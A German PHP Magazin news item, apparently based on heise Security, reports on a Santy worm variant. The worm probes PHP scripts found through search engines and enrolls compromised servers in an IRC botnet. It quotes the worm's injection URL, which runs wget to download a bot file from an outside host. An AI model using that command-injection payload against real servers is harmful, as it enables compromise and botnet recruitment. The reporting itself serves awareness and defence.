1. PHP Magazin
  2. Software & Web-Development
  3. Wurm attackiert PHP-Skripte

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Ratings

There are no comments available yet.

Here you can write a comment


Please enter at least 10 characters.
Loading... Please wait.
* Pflichtangabe

Related topics

PHP World in München

Zeev Suraski, der israelische Hauptentwickler von PHP, wird am 21. Oktober den Fachkongress "PHP World" in München eröffnen. PHP ist heute die am weitesten verbreitete Webskript-Sprache für Internet-Entwickler. Der Kongress findet im Rahmen der SYSTEMS ...

admin

Autor : admin
Category: Software & Web-Development

the PHP resource auf one-2-one.net

Seit heute läuft unsere Seite auf einem one-2-one.net Server. Bei der Umstellung wurden folgende Änderungen vorgenommen. - von php3 auf php4 - wechsle der Server (von Puretec.de zu one-2-one.net) - Verbessertes Top25 Script - Integration der Dmoz.o ...

admin

Autor : admin
Category: Software & Web-Development

IBM entwickelt "schnellsten Prozessor der Welt"

Der neue Siliziumprozessor erreiche eine Geschwindigkeit von 210 Gigahertz. Damit sei eine magische Grenze durchbrochen. Genau wie man früher geglaubt habe, dass Flugzeuge nie die Schallmauer durchbrechen könnten, sei man bisher überzeugt gewesen, dass Si ...

admin

Autor : admin
Category: Software & Web-Development

Wissensbestand in Unternehmen

Lebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen ...

admin

Autor : admin
Category: Software & Web-Development

ShiftEdit - online IDE für Web-Entwickler

Mit ShiftEdit können PHP, Ruby, Python, Perl, HTML, CSS and JavaScript Dateien über FTP, SFTP online geändert werden. ...

phpler

Autor : phpler
Category: Software & Web-Development

Microsoft erobert Datenbank-Krone

In der aktuellen Top-10-Liste der schnellsten Datenbanken der Welt hat Microsofts SQL Server 2000 den ersten Platz zurückerobert. Bei einem Benchmark nach der TPC-C-Spezifikation lieferte der Kandidat aus Redmond auf einem Cluster aus Compaq-ProLiant-8500 ...

admin

Autor : admin
Category: Software & Web-Development

Magazin & Tutorials
StepStone
Finde den richtigen Job
Düsseldorf, Deutschland

Publish a press release

Share your news and information

Share your news and information with others

You want to inform other users about an interesting IT topic, then sign up now and share it with our PHP community

learn more

Publish a press release